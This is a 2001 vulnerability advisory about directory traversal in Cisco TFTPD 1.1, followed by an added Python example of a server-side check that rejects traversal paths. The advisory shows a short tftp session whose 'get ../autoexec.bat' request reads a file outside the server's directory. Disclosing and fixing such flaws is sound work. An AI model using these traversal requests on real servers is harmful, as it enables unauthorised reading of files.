The OpenNET Project
 


Cisco TFTPD 1.1 Vulnerability


Date: Mon, 18 Jun 2001 15:29:14 +0200
From: Siberian <siberian@splashpages.de.>
To: [email protected]
Subject: Cisco TFTPD 1.1 Vulnerability

[Sentry Research Labs - ID0201061701]
(c) 2001 by www.sentry-labs.com


Note:
This advisory is for informational and educational purposes only! We 
are not responsible for any abuse or damage resulting from this
information.

Author: 
Siberian

Topic: 
Security Bug in CISCO TFTPD server 1.1 

Vendor Status:
Informed (06/17/01)

Vendor URL: 
http://www.cisco.com/pcgi-bin/tablebuild.pl/tftp

Preamble:
This software is some days old and I do not know if it is still supported, 
but it is a serious issue which should be reported. The bug itself is very 
common.

Issue:
TFTPD is vulnerable to a primitive directory traversal attack which
allows a remote user to obtain any file from the target system.

Exploit (using tftp client (Linux)):
tftp> connect target
tftp> get ../autoexec.bat
Received 218 bytes in 0.4 seconds
tftp> quit

Workaround:
Install your base directory on another partition or hard drive (not c:)
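
The server-side check whose absence the issue describes, as an added example that is not from the advisory or from Cisco's code: it parses a TFTP read request and refuses any filename that would leave the base directory. `BASE_DIR`, the function names and the sample packets are assumptions made for illustration.

```python
import struct
from pathlib import PureWindowsPath

TFTP_RRQ = 1  # read-request opcode (RFC 1350)
BASE_DIR = PureWindowsPath(r"D:\tftproot")  # assumed base directory


class RequestRejected(Exception):
    """Raised when a request must be answered with a TFTP error."""


def parse_rrq(packet):
    """Return (filename, mode) from an RRQ: opcode | filename | 0 | mode | 0."""
    if len(packet) < 4 or struct.unpack("!H", packet[:2])[0] != TFTP_RRQ:
        raise RequestRejected("not a read request")
    fields = packet[2:].split(b"\x00")
    if len(fields) < 3 or not fields[0] or not fields[1]:
        raise RequestRejected("malformed read request")
    try:
        return fields[0].decode("ascii"), fields[1].decode("ascii").lower()
    except UnicodeDecodeError:
        raise RequestRejected("non-ASCII field") from None


def resolve_in_base(filename, base=BASE_DIR):
    """Map a requested name to a path under base, or raise RequestRejected."""
    # PureWindowsPath treats both '/' and '\' as separators on any host OS.
    path = PureWindowsPath(filename)
    if path.anchor or ":" in filename:
        raise RequestRejected("absolute path, drive or stream not allowed")
    if not path.parts or ".." in path.parts:
        raise RequestRejected("path leaves the base directory")
    return base / path


def handle_read_request(packet, base=BASE_DIR):
    """Parse one RRQ packet and return the file path it may read."""
    filename, _mode = parse_rrq(packet)
    return resolve_in_base(filename, base)


if __name__ == "__main__":
    # Constructed sample packets, not captured traffic.
    for name in (b"../autoexec.bat", b"..\\autoexec.bat", b"images/ios.bin"):
        pkt = struct.pack("!H", TFTP_RRQ) + name + b"\x00octet\x00"
        try:
            print(name, "->", handle_read_request(pkt))
        except RequestRejected as exc:
            print(name, "-> rejected:", exc)
```
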


